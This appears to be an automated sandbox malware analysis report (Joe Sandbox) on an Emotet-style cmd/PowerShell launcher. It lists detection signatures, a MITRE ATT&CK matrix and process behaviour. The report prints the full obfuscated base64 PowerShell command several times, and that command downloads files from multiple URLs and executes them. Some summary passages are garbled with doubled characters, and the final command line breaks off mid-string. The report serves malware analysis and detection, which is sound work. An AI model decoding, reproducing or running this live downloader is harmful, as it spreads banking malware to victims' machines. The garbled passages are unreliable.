Automated Malware Analysis Report

ID: 281116 Cookbook: defaultwindowscmdlinecookbook.jbs Time: 15:00:02 Date: 02/09/2020 Version: 29.0.0 Ocean Jasper Table of Contents

Table of Contents 2 Analysis Report 4 Overview 4 General Information 4 Detection 4 Signatures 4 Classification 4 Startup 4 Malware Configuration 5 Yara Overview 6 Sigma Overview 6 System Summary: 6 Signature Overview 6 E-Banking Fraud: 6 System Summary: 6 Data Obfuscation: 6 HIPS / PFW / Operating System Protection Evasion: 6 Mitre Att&ck Matrix 6 Behavior Graph 7 Screenshots 7 Thumbnails 7 Antivirus, Machine Learning and Genetic Malware Detection 8 Initial Sample 8 Dropped Files 8 Unpacked PE Files 8 Domains 8 URLs 8 Domains and IPs 8 Contacted Domains 9 Contacted IPs 9 General Information 9 Simulations 9 Behavior and APIs 9 Joe Sandbox View / Context 9 IPs 9 Domains 9 ASN 10 JA3 Fingerprints 10 Dropped Files 10 Created / dropped Files 10 Static File Info 10 No static file info 10 Network Behavior 10 Code Manipulations 10 Statistics 10 Behavior 10 System Behavior 11 Analysis Process: cmd.exe PID: 6904 Parent PID: 4608 11 General 11 File Activities 12 Analysis Process: conhost.exe PID: 6912 Parent PID: 6904 13 General 13 Analysis Process: powershell.exe PID: 6956 Parent PID: 6904 13 General 13 File Activities 14 File Created 14 Copyright null 2020 Page 2 of 16 File Written 15 File Read 15 Disassembly 16

Overview

General Information Detection Signatures Classification

Analysis ID: 281116 Maallliiicciiioouuss eennccrrryyppttteedd PPoowweerrrsshheellllll ccoom… Most interesting Screenshot: SMSiiigagmlicaiao dudeset tteecnctctteerdyd:p:: EtEemd ooPttteoetwtt PPerrrosochceeslsls sc CoCmrrr…

ESEningccmrrryyapp tdtteeeddt e ppcootwewdee:rr rsEshhmeeollllll t cecmt Pddrllliioinnceee osopsp tttCiiioornn…

Ransomware Encrypted powershell cmdline option PEPonowcwreeyrrprSStehhdee llllpll cocawasseeer s aahnneoolml caamlllyyd flffioonuuenn oddption Miner Spreading

SPSioiggwmeaar S ddheeetteellc cctteaedsd:e: S Sauunssoppmiiccaiioloyuu sfso EuEnndccooddee mmaallliiiccciiioouusss SSiiiggmaa ddeettteeccttteedd::: SSuussppiiicciiioouuss EEnnccooddee… malicious

Evader Phishing

sssuusssppiiiccciiioouusss VSVeiegrrrmyy lalloo ndngeg t cecocomtemd:a aSnnudds llpliiinniceei o fffouousun nEddncode suspicious

cccllleeaann

clean CVCoeonrnyttta aloiiinnnssg l lloconongmg smsllleeaeenppdss l i((n(>>e== f 3o3 u mnidiinn))) Exploiter Banker

CCrroreenaattatteeinss s aa l oppnrrrogoc cseelsesses piiinns ss(u>us=sp p3ee nmnddiened)d moo…

Spyware Trojan / Bot ECEnrneaaabbtllleess add eepbbruougcge ppsrrrsiiiv viiinilllee sggueesspended mo Adware

MEnaaayyb sslellleesee dppe (((beeuvvgaa sspiiivrvieve i llloeoogopepss))) tttoo hhiiinnddeerrr … Score: 72 Range: 0 - 100 QMuaueyerr risiieeless e ttthphe e( e vvvooalllusumivee liiionnofffooprrrsm) aatotttiii oohnnin (((dnneaarm …

Whitelisted: false VQVeeurrreyyr illleoosnn ggth ccem vddollliiiunnmee eoo ppintttiiifoonnr m fffooauutninoddn,,, (ttthnhiaiissm… Confidence: 100% Very long cmdline option found, this

Startup

Copyright null 2020 Page 4 of 16 System is w10x64 cmd.exe (PID: 6904 cmdline: cmd /C 'powersheLL -e JABFAHAAagA1ADgAOQBpAD0AKAAoACcAWABmADAAJwArACcAaAAnACkAKwAoACcAcgAzACcAKwAnAG wAJwApACkAOwAuACgAJwBuAGUAdwAtACcAKwAnAGkAdABlAG0AJwApACAAJABlAE4AdgA6AFUAcwBlAFIAcABSAG8AZgBpAGwARQBcAFAAUwAyADkAQgA2AE MAXABMAFMAcQAzAEIAXwBMAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQASQBSAEUAYwBUAG8AUgB5ADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAG kAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBVAHIASQBgAFQAeQBQAFIAYABPAHQAYABPAGMAYABvAEwAIgAgAD0AIAAoACgAJwB0AGwAcwAnAC sAJwAxADIALAAnACkAKwAnACAAJwArACcAdAAnACsAKAAnAGwAcwAnACsAJwAxADEAJwApACsAJwAsACAAJwArACgAJwB0ACcAKwAnAGwAcwAnACkAKQA7ACQASABfADgA agB0ADUAYwAgAD0AIAAoACgAJwBaACcAKwAnAHYAaAAnACkAKwAoACcANQAnACsAJwBlAGEAJwApACsAJwBuAHYAJwApADsAJABSAF8AegBzAHYAMQBrAD0A KAAoACcAQgBjACcAKwAnAGQAdQBpACcAKQArACcAOAAnACsAJwB5ACcAKQA7ACQATABuAHgAcABoADkAbQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYA aQBsAGUAKwAoACgAJwA1AFQAJwArACgAJwB6ACcAKwAnAFAAJwArACcAcwAyADkAYgA2AGMAJwApACsAJwA1ACcAKwAoACcAVAB6ACcAKwAnAEwAcwAnACkA KwAoACcAcQAzACcAKwAnAGIAJwArACcAXwBsADUAVAB6ACcAKQApACAAIAAtAEMAUgBFAFAATABBAEMAZQAoACcANQBUACcAKwAnAHoAJwApACwAWwBjAEgA QQBSAF0AOQAyACkAKwAkAEgAXwA4AGoAdAA1AGMAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABMAGIANwA4ADYAcgB5AD0AKAAoACcA VgAzACcAKwAnAHEANAAnACkAKwAoACcAcwAyACcAKwAnAGcAJwApACkAOwAkAFMAZQA1AHoAaAB0AG0APQAmACgAJwBuAGUAdwAnACsAJwAtAG8AYgBqACcA KwAnAGUAYwB0ACcAKQAgAE4ARQB0AC4AdwBFAEIAYwBMAGkAZQBOAHQAOwAkAEYAaQA4AGkAZwBvAGIAPQAoACcAaAAnACsAJwB0AHQAJwArACcAcAAnACsA JwA6AC8AJwArACgAJwAvAHIAJwArACcAdQBlACcAKQArACcAYwBrACcAKwAnAGUAcgAnACsAKAAnAHQALQAnACsAJwBvACcAKQArACgAJwBuAGwAaQBuACcAKwAnAGUAJw ArACcALgBkACcAKQArACgAJwBlAC8AJwArACcAYwBnAGkAJwApACsAJwAtAGIAJwArACgAJwBpAG4AJwArACcALwAnACkAKwAnAEsAJwArACgAJwByACcAKwAnAGgANwBu AHIAJwArACcAMQA5ADcAOAAnACsAJwAvACoAJwApACsAJwBoACcAKwAnAHQAdAAnACsAJwBwACcAKwAoACcAcwA6ACcAKwAnAC8AJwApACsAJwAvACcAKwAo ACcAcgB1AGIAJwArACcAZQBuAHcAJwApACsAKAAnAGkAbgAnACsAJwBrAGUAbABtACcAKQArACgAJwBhAG4ALgAnACsAJwBuACcAKwAnAGwALwBjACcAKQArACcAZwBpAC cAKwAnAC0AJwArACcAYgBpACcAKwAoACcAbgAvACcAKwAnAGwAVQAnACkAKwAoACcASAAnACsAJwAvACoAaAB0ACcAKQArACcAdAAnACsAKAAnAHAAOgAnAC sAJwAvACcAKQArACgAJwAvACcAKwAnAHIAdQBwAGUAcgAnACkAKwAnAHQAJwArACgAJwBzAHQAJwArACcAcgBlACcAKQArACgAJwBlAHQALgBkACcAKwAnAGUAJwApACsA JwAvACcAKwAnAEgAJwArACgAJwBlAGkAZABpACcAKwAnAHMALQAnACkAKwAnAEUAJwArACgAJwB4ACcAKwAnAC8AYQB0AHQAYQAnACsAJwBjAGgALwB2ACcA KQArACcAQwAnACsAJwBGAFMAJwArACgAJwBhAGsAJwArACcAUABIAHEALwAqACcAKQArACcAaAAnACsAKAAnAHQAdABwADoALwAvACcAKwAnAHMAYQAnACkA KwAnAG0AJwArACgAJwBhAHQAZQBjACcAKwAnAGgAJwApACsAKAAnAG4AaQBjACcAKwAnAHMAJwApACsAJwAuAGMAJwArACgAJwBvAG0AJwArACcALwBfACcA KwAnAHMAYwByAGkAJwApACsAKAAnAHAAJwArACcAdABzAC8ARAAnACkAKwAoACcAVwB4AGkAcAAnACsAJwB3AC8AJwArACcAKgBoACcAKQArACcAdAAnACsA KAAnAHQAJwArACcAcAA6ACcAKQArACcALwAnACsAKAAnAC8AJwArACcAcwBjACcAKQArACcAaABhACcAKwAoACcAaQBkACcAKwAnAGwAJwApACsAKAAnAC4AZAAnACsAJw BlACcAKQArACcALwBiACcAKwAoACcAaQBsAGQAJwArACcAZQByAC8AJwApACsAJwBrACcAKwAnAGMAMQAnACsAKAAnAHIAcwA0ACcAKwAnADcAJwArACcANAA2ACcAKQAr ACcANQA3ACcAKwAnAC8AKgAnACsAKAAnAGgAdAAnACsAJwB0AHAAOgAnACkAKwAoACcALwAnACsAJwAvAHMAJwApACsAKAAnAGEAJwArACcAdQBlAHIAYgBl AGMAawAuACcAKwAnAG4AJwArACcAZQB0AC8AYwBnAGkALQAnACkAKwAnAGIAJwArACcAaQAnACsAJwBuACcAKwAnAC8ATQAnACsAKAAnAFcAJwArACcAUgBP AGkAcwBHAFUARAAnACsAJwBwACcAKwAnAEIALwAqAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACsAKAAnADoALwAvACcAKwAnAHMAJwApACsAKAAnAGMAJwAr ACcAaABhACcAKQArACgAJwBlACcAKwAnAGYAZQByACcAKQArACgAJwAtAGYAJwArACcAcgBhAG4AJwArACcAawAuAGQAJwApACsAKAAnAGUALwBjACcAKwAnAGcAaQAtAG IAaQBuACcAKwAnAC8AYwAnACkAKwAnAGIAJwArACgAJwBqACcAKwAnADUAcgAnACkAKwAnAG4AJwArACgAJwBxAG0ANgA1ACcAKwAnAHoAJwArACcAbQA4AD MAJwApACsAJwAxACcAKwAnADIALwAnACkALgAiAFMAYABwAEwAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUgB1AGgAMAB0ADQAbAA9ACgAKAAnAF IAdAAnACsAJwBwACcAKQArACgAJwAxAGgAYgAnACsAJwAzACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQASwBjAG8ANABsADYAOQAgAGkAbgAgACQARgBpAD gAaQBnAG8AYgApAHsAdAByAHkAewAkAFMAZQA1AHoAaAB0AG0ALgAiAEQAbwBXAGAATgBMAE8AYQBgAEQAZgBgAGkAbABFACIAKAAkAEsAYwBvADQAbAA2AD kALAAgACQATABuAHgAcABoADkAbQApADsAJABPAHYAeQAwAHIAegBwAD0AKAAnAEkAcwAnACsAKAAnAHkAJwArACcANABrAHMAZwAnACkAKQ7AEkAZgAgACg AKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdABlACcAKwAnAG0AJwApACAAJABMAG4AeABwAGgAOQBtACkALgAiAEwAZQBuAGcAYABUAEgAIgAgAC0AZwBlACA AMgA1ADcAOAA2ACkAIAB7ACYAKAAnAEkAbgB2AG8AJwArACcAawBlAC0ASQAnACsAJwB0AGUAbQAnACkAKAAkAEwAbgB4AHAAaAA5AG0AKQA7ACQAQQA3AHo AegB6ADEAeQA9ACgAJwBMACcAKwAoACcAaQAnACsAJwBtAGIAMABfADQAJwApACkAOwBiAHIAZQBhAGsAOwAkAFUAaQA4AGQAaQB3AF8APQAoACgAJwBBAHg AYgBlACcAKwAnAHMAZgAnACkAKwAnAGcAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABEADUAZwBnAGMAXwA3AD0AKAAnAEEAaAAnACsAKAAnAGEAJwArACc AcQBkACcAKQArACcAZwBuACcAKQA=' MD5: F3BDBE3BB6F734E357235F4D5898582D) conhost.exe (PID: 6912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) powershell.exe (PID: 6956 cmdline: powersheLL -e JABFAHAAagA1ADgAOQBpAD0AKAAoACcAWABmADAAJwArACcAaAAnACkAKwAoACcAcgAzACcAKwAn AGwAJwApACkAOwAuACgAJwBuAGUAdwAtACcAKwAnAGkAdABlAG0AJwApACAAJABlAE4AdgA6AFUAcwBlAFIAcABSAG8AZgBpAGwARQBcAFAAUwAyADkAQgA2 AEMAXABMAFMAcQAzAEIAXwBMAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQASQBSAEUAYwBUAG8AUgB5ADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABv AGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBVAHIASQBgAFQAeQBQAFIAYABPAHQAYABPAGMAYABvAEwAIgAgAD0AIAAoACgAJwB0AGwAcwAn ACsAJwAxADIALAAnACkAKwAnACAAJwArACcAdAAnACsAKAAnAGwAcwAnACsAJwAxADEAJwApACsAJwAsACAAJwArACgAJwB0ACcAKwAnAGwAcwAnACkAKQA7 ACQASABfADgAagB0ADUAYwAgAD0AIAAoACgAJwBaACcAKwAnAHYAaAAnACkAKwAoACcANQAnACsAJwBlAGEAJwApACsAJwBuAHYAJwApADsAJABSAF8AegBz AHYAMQBrAD0AKAAoACcAQgBjACcAKwAnAGQAdQBpACcAKQArACcAOAAnACsAJwB5ACcAKQA7ACQATABuAHgAcABoADkAbQA9ACQAZQBuAHYAOgB1AHMAZQBy AHAAcgBvAGYAaQBsAGUAKwAoACgAJwA1AFQAJwArACgAJwB6ACcAKwAnAFAAJwArACcAcwAyADkAYgA2AGMAJwApACsAJwA1ACcAKwAoACcAVAB6ACcAKwAn AEwAcwAnACkAKwAoACcAcQAzACcAKwAnAGIAJwArACcAXwBsADUAVAB6ACcAKQApACAAIAAtAEMAUgBFAFAATABBAEMAZQAoACcANQBUACcAKwAnAHoAJwAp ACwAWwBjAEgAQQBSAF0AOQAyACkAKwAkAEgAXwA4AGoAdAA1AGMAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABMAGIANwA4ADYAcgB5 AD0AKAAoACcAVgAzACcAKwAnAHEANAAnACkAKwAoACcAcwAyACcAKwAnAGcAJwApACkAOwAkAFMAZQA1AHoAaAB0AG0APQAmACgAJwBuAGUAdwAnACsAJwAt AG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4ARQB0AC4AdwBFAEIAYwBMAGkAZQBOAHQAOwAkAEYAaQA4AGkAZwBvAGIAPQAoACcAaAAnACsAJwB0AHQAJwAr ACcAcAAnACsAJwA6AC8AJwArACgAJwAvAHIAJwArACcAdQBlACcAKQArACcAYwBrACcAKwAnAGUAcgAnACsAKAAnAHQALQAnACsAJwBvACcAKQArACgAJwBu AGwAaQBuACcAKwAnAGUAJwArACcALgBkACcAKQArACgAJwBlAC8AJwArACcAYwBnAGkAJwApACsAJwAtAGIAJwArACgAJwBpAG4AJwArACcALwAnACkAKwAn AEsAJwArACgAJwByACcAKwAnAGgANwBuAHIAJwArACcAMQA5ADcAOAAnACsAJwAvACoAJwApACsAJwBoACcAKwAnAHQAdAAnACsAJwBwACcAKwAoACcAcwA6 ACcAKwAnAC8AJwApACsAJwAvACcAKwAoACcAcgB1AGIAJwArACcAZQBuAHcAJwApACsAKAAnAGkAbgAnACsAJwBrAGUAbABtACcAKQArACgAJwBhAG4ALgAn ACsAJwBuACcAKwAnAGwALwBjACcAKQArACcAZwBpACcAKwAnAC0AJwArACcAYgBpACcAKwAoACcAbgAvACcAKwAnAGwAVQAnACkAKwAoACcASAAnACsAJwAv ACoAaAB0ACcAKQArACcAdAAnACsAKAAnAHAAOgAnACsAJwAvACcAKQArACgAJwAvACcAKwAnAHIAdQBwAGUAcgAnACkAKwAnAHQAJwArACgAJwBzAHQAJwAr ACcAcgBlACcAKQArACgAJwBlAHQALgBkACcAKwAnAGUAJwApACsAJwAvACcAKwAnAEgAJwArACgAJwBlAGkAZABpACcAKwAnAHMALQAnACkAKwAnAEUAJwAr ACgAJwB4ACcAKwAnAC8AYQB0AHQAYQAnACsAJwBjAGgALwB2ACcAKQArACcAQwAnACsAJwBGAFMAJwArACgAJwBhAGsAJwArACcAUABIAHEALwAqACcAKQAr ACcAaAAnACsAKAAnAHQAdABwADoALwAvACcAKwAnAHMAYQAnACkAKwAnAG0AJwArACgAJwBhAHQAZQBjACcAKwAnAGgAJwApACsAKAAnAG4AaQBjACcAKwAn AHMAJwApACsAJwAuAGMAJwArACgAJwBvAG0AJwArACcALwBfACcAKwAnAHMAYwByAGkAJwApACsAKAAnAHAAJwArACcAdABzAC8ARAAnACkAKwAoACcAVwB4 AGkAcAAnACsAJwB3AC8AJwArACcAKgBoACcAKQArACcAdAAnACsAKAAnAHQAJwArACcAcAA6ACcAKQArACcALwAnACsAKAAnAC8AJwArACcAcwBjACcAKQAr ACcAaABhACcAKwAoACcAaQBkACcAKwAnAGwAJwApACsAKAAnAC4AZAAnACsAJwBlACcAKQArACcALwBiACcAKwAoACcAaQBsAGQAJwArACcAZQByAC8AJwAp ACsAJwBrACcAKwAnAGMAMQAnACsAKAAnAHIAcwA0ACcAKwAnADcAJwArACcANAA2ACcAKQArACcANQA3ACcAKwAnAC8AKgAnACsAKAAnAGgAdAAnACsAJwB0 AHAAOgAnACkAKwAoACcALwAnACsAJwAvAHMAJwApACsAKAAnAGEAJwArACcAdQBlAHIAYgBlAGMAawAuACcAKwAnAG4AJwArACcAZQB0AC8AYwBnAGkALQAn ACkAKwAnAGIAJwArACcAaQAnACsAJwBuACcAKwAnAC8ATQAnACsAKAAnAFcAJwArACcAUgBPAGkAcwBHAFUARAAnACsAJwBwACcAKwAnAEIALwAqAGgAdAAn ACsAJwB0ACcAKQArACcAcAAnACsAKAAnADoALwAvACcAKwAnAHMAJwApACsAKAAnAGMAJwArACcAaABhACcAKQArACgAJwBlACcAKwAnAGYAZQByACcAKQAr ACgAJwAtAGYAJwArACcAcgBhAG4AJwArACcAawAuAGQAJwApACsAKAAnAGUALwBjACcAKwAnAGcAaQAtAGIAaQBuACcAKwAnAC8AYwAnACkAKwAnAGIAJwAr ACgAJwBqACcAKwAnADUAcgAnACkAKwAnAG4AJwArACgAJwBxAG0ANgA1ACcAKwAnAHoAJwArACcAbQA4ADMAJwApACsAJwAxACcAKwAnADIALwAnACkALgAi AFMAYABwAEwAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUgB1AGgAMAB0ADQAbAA9ACgAKAAnAFIAdAAnACsAJwBwACcAKQArACgAJwAxAGgAYgAn ACsAJwAzACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQASwBjAG8ANABsADYAOQAgAGkAbgAgACQARgBpADgAaQBnAG8AYgApAHsAdAByAHkAewAkAFMAZQA1 AHoAaAB0AG0ALgAiAEQAbwBXAGAATgBMAE8AYQBgAEQAZgBgAGkAbABFACIAKAAkAEsAYwBvADQAbAA2ADkALAAgACQATABuAHgAcABoADkAbQApADsAJABP AHYAeQAwAHIAegBwAD0AKAAnAEkAcwAnACsAKAAnAHkAJwArACcANABrAHMAZwAnACkAKQ7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdABlA CcAKwAnAG0AJwApACAAJABMAG4AeABwAGgAOQBtACkALgAiAEwAZQBuAGcAYABUAEgAIgAgAC0AZwBlACAAMgA1ADcAOAA2ACkAIAB7ACYAKAAnAEkAbgB2A G8AJwArACcAawBlAC0ASQAnACsAJwB0AGUAbQAnACkAKAAkAEwAbgB4AHAAaAA5AG0AKQA7ACQAQQA3AHoAegB6ADEAeQA9ACgAJwBMACcAKwAoACcAaQAnA CsAJwBtAGIAMABfADQAJwApACkAOwBiAHIAZQBhAGsAOwAkAFUAaQA4AGQAaQB3AF8APQAoACgAJwBBAHgAYgBlACcAKwAnAHMAZgAnACkAKwAnAGcAJwApA H0AfQBjAGEAdABjAGgAewB9AH0AJABEADUAZwBnAGMAXwA3AD0AKAAnAEEAaAAnACsAKAAnAGEAJwArACcAcQBkACcAKQArACcAZwBuACcAKQA= MD5: DBA3E6449E97D4E3DF64527EF7012A10) cleanup

Malware Configuration

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Emotet Process Creation

Sigma detected: Suspicious Encoded PowerShell Command Line

Signature Overview

• E-Banking Fraud • System Summary • Data Obfuscation • Hooking and other Techniques for Hiding and Protection • Malware Analysis System Evasion • Anti Debugging • HIPS / PFW / Operating System Protection Evasion • Language, Device and Operating System Detection

Click to jump to signature section

E-Banking Fraud:

Malicious encrypted Powershell command line found

System Summary:

Very long command line found

Data Obfuscation:

PowerShell case anomaly found

HIPS / PFW / Operating System Protection Evasion:

Encrypted powershell cmdline option found

Mitre Att&ck Matrix

Copyright null 2020 Page 6 of 16 Initial Privilege Credential Lateral Command Network Access Execution Persistence Escalation Defense Evasion Access Discovery Movement Collection Exfiltration and Control Effects Valid Command and Path Process Masquerading 1 OS Virtualization/Sandbox Remote Data from Exfiltration Data Eavesdrop on Accounts Scripting Interception Injection 1 1 Credential Evasion 2 Services Local Over Other Obfuscation Insecure Interpreter 1 1 Dumping System Network Network Medium Communication Default PowerShell 3 Boot or Boot or Logon Virtualization/Sandbox LSASS Process Discovery 1 Remote Data from Exfiltration Junk Data Exploit SS7 to Accounts Logon Initialization Evasion 2 Memory Desktop Removable Over Redirect Phone Initialization Scripts Protocol Media Bluetooth Calls/SMS Scripts Domain At (Linux) Logon Script Logon Script Process Security System Information SMB/Windows Data from Automated Steganography Exploit SS7 to Accounts (Windows) (Windows) Injection 1 1 Account Discovery 1 1 Admin Shares Network Exfiltration Track Device Manager Shared Location Drive Local At (Windows) Logon Script Logon Script Deobfuscate/Decode NTDS System Network Distributed Input Scheduled Protocol SIM Card Accounts (Mac) (Mac) Files or Information 1 Configuration Component Capture Transfer Impersonation Swap Discovery Object Model

Behavior Graph

Hide Legend Legend: Process Signature Created File DNS/IP Info Behavior Graph

ID: 281116 Is Dropped

Cookbook: defaultwindowscmdlinecookbook.jbs Is Windows Process Startdate: 02/09/2020 Architecture: WINDOWS Number of created Registry Values Score: 72 Number of created Files

Visual Basic Malicious encrypted Sigma detected: Emotet Very long command line Powershell command line 3 other signatures started Process Creation found Delphi found Java

.Net C# or VB.NET cmd.exe C, C++ or other language

Is malicious 1 Internet

Malicious encrypted Very long command line Encrypted powershell PowerShell case anomaly Powershell command line started started found cmdline option found found found

powershell.exe conhost.exe

Screenshots

Thumbnails This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version: 29.0.0 Ocean Jasper Analysis ID: 281116 Start date: 02.09.2020 Start time: 15:00:02 Joe Sandbox Product: CloudBasic Overall analysis duration: 0h 1m 47s Hypervisor based Inspection enabled: false Report type: light Cookbook file name: defaultwindowscmdlinecookbook.jbs Analysis system description: w10x64 Windows 10 64 bit v1803 with Office Professional Plus 2016, IE 11, Adobe Reader DC 19, Java 8 Update 211 Number of analysed new started processes analysed: 3 Number of new started drivers analysed: 0 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 0 Technologies: EGA enabled HDC enabled AMSI enabled Analysis Mode: default Analysis stop reason: Timeout Detection: MAL Classification: mal72.bank.evad.win@4/1@0/0 Cookbook Comments: Adjust boot time Enable AMSI Stop behavior analysis, all processes terminated

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File Type: data Size (bytes): 728 Entropy (8bit): 5.05097364910619 Encrypted: false MD5: 900997B3FF6514BF775CAC6FFCBB6D4B SHA1: CED01BFEE8A92DE7946C57AA3A8B9F043708E3D7 SHA-256: 740D9FC7EBE38ED3CCBB029A5592E89128F86039BABC8FEAA0CF1376201850C2 SHA-512: 3B408E288656F51077BF8104B5A02C68E34954213ECD75D45588747A5C03E5572CB7EFF6DC5A27625A4C93D6FA185260324E0BE9B387DBF48656F1044010D4E2 Malicious: false Reputation: low Preview: @...e...... H...... <@.^.L."My...:...... Microsoft.PowerShell.ConsoleHostD...... fZve...F.....x.)...... System.Management.Automati on4...... [...{a.C..%6..h...... System.Core.0...... G-.o...A...4B...... System..4...... Zg5..:O..g..q...... System.Xml..L...... 7.....J@...... ~...... #.Microso ft.Management.Infrastructure.8...... '....L..}...... System.Numerics.@...... Lo...QN...... @.G.@...@..@@.

Static File Info

No static file info

Network Behavior

No network behavior found

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: cmd.exe PID: 6904 Parent PID: 4608

General

Start time: 15:00:47 Start date: 02/09/2020 Path: C:\Windows\SysWOW64\cmd.exe Wow64 process (32bit): true

Copyright null 2020 Page 11 of 16 Commandline: cmd /C 'powersheLL -e JABFAHAAagA1ADgAOQBpAD0AKAAoACcAWABmADAAJwArACcA aAAnACkAKwAoACcAcgAzACcAKwAnAGwAJwApACkAOwAuACgAJwBuAGUAdwAt ACcAKwAnAGkAdABlAG0AJwApACAAJABlAE4AdgA6AFUAcwBlAFIAcABSAG8A ZgBpAGwARQBcAFAAUwAyADkAQgA2AEMAXABMAFMAcQAzAEIAXwBMAFwAIAAt AGkAdABlAG0AdAB5AHAAZQAgAGQASQBSAEUAYwBUAG8AUgB5ADsAWwBOAGUA dAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6 ADoAIgBTAGUAQwBVAHIASQBgAFQAeQBQAFIAYABPAHQAYABPAGMAYABvAEwA IgAgAD0AIAAoACgAJwB0AGwAcwAnACsAJwAxADIALAAnACkAKwAnACAAJwAr ACcAdAAnACsAKAAnAGwAcwAnACsAJwAxADEAJwApACsAJwAsACAAJwArACgA JwB0ACcAKwAnAGwAcwAnACkAKQA7ACQASABfADgAagB0ADUAYwAgAD0AIAAo ACgAJwBaACcAKwAnAHYAaAAnACkAKwAoACcANQAnACsAJwBlAGEAJwApACsA JwBuAHYAJwApADsAJABSAF8AegBzAHYAMQBrAD0AKAAoACcAQgBjACcAKwAn AGQAdQBpACcAKQArACcAOAAnACsAJwB5ACcAKQA7ACQATABuAHgAcABoADkA bQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwA1 AFQAJwArACgAJwB6ACcAKwAnAFAAJwArACcAcwAyADkAYgA2AGMAJwApACsA JwA1ACcAKwAoACcAVAB6ACcAKwAnAEwAcwAnACkAKwAoACcAcQAzACcAKwAn AGIAJwArACcAXwBsADUAVAB6ACcAKQApACAAIAAtAEMAUgBFAFAATABBAEMA ZQAoACcANQBUACcAKwAnAHoAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKwAk AEgAXwA4AGoAdAA1AGMAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcA KQApADsAJABMAGIANwA4ADYAcgB5AD0AKAAoACcAVgAzACcAKwAnAHEANAAn ACkAKwAoACcAcwAyACcAKwAnAGcAJwApACkAOwAkAFMAZQA1AHoAaAB0AG0A PQAmACgAJwBuAGUAdwAnACsAJwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAg AE4ARQB0AC4AdwBFAEIAYwBMAGkAZQBOAHQAOwAkAEYAaQA4AGkAZwBvAGIA PQAoACcAaAAnACsAJwB0AHQAJwArACcAcAAnACsAJwA6AC8AJwArACgAJwAv AHIAJwArACcAdQBlACcAKQArACcAYwBrACcAKwAnAGUAcgAnACsAKAAnAHQA LQAnACsAJwBvACcAKQArACgAJwBuAGwAaQBuACcAKwAnAGUAJwArACcALgBk ACcAKQArACgAJwBlAC8AJwArACcAYwBnAGkAJwApACsAJwAtAGIAJwArACgA JwBpAG4AJwArACcALwAnACkAKwAnAEsAJwArACgAJwByACcAKwAnAGgANwBu AHIAJwArACcAMQA5ADcAOAAnACsAJwAvACoAJwApACsAJwBoACcAKwAnAHQA dAAnACsAJwBwACcAKwAoACcAcwA6ACcAKwAnAC8AJwApACsAJwAvACcAKwAo ACcAcgB1AGIAJwArACcAZQBuAHcAJwApACsAKAAnAGkAbgAnACsAJwBrAGUA bABtACcAKQArACgAJwBhAG4ALgAnACsAJwBuACcAKwAnAGwALwBjACcAKQAr ACcAZwBpACcAKwAnAC0AJwArACcAYgBpACcAKwAoACcAbgAvACcAKwAnAGwA VQAnACkAKwAoACcASAAnACsAJwAvACoAaAB0ACcAKQArACcAdAAnACsAKAAn AHAAOgAnACsAJwAvACcAKQArACgAJwAvACcAKwAnAHIAdQBwAGUAcgAnACkA KwAnAHQAJwArACgAJwBzAHQAJwArACcAcgBlACcAKQArACgAJwBlAHQALgBk ACcAKwAnAGUAJwApACsAJwAvACcAKwAnAEgAJwArACgAJwBlAGkAZABpACcA KwAnAHMALQAnACkAKwAnAEUAJwArACgAJwB4ACcAKwAnAC8AYQB0AHQAYQAn ACsAJwBjAGgALwB2ACcAKQArACcAQwAnACsAJwBGAFMAJwArACgAJwBhAGsA JwArACcAUABIAHEALwAqACcAKQArACcAaAAnACsAKAAnAHQAdABwADoALwAv ACcAKwAnAHMAYQAnACkAKwAnAG0AJwArACgAJwBhAHQAZQBjACcAKwAnAGgA JwApACsAKAAnAG4AaQBjACcAKwAnAHMAJwApACsAJwAuAGMAJwArACgAJwBv AG0AJwArACcALwBfACcAKwAnAHMAYwByAGkAJwApACsAKAAnAHAAJwArACcA dABzAC8ARAAnACkAKwAoACcAVwB4AGkAcAAnACsAJwB3AC8AJwArACcAKgBo ACcAKQArACcAdAAnACsAKAAnAHQAJwArACcAcAA6ACcAKQArACcALwAnACsA 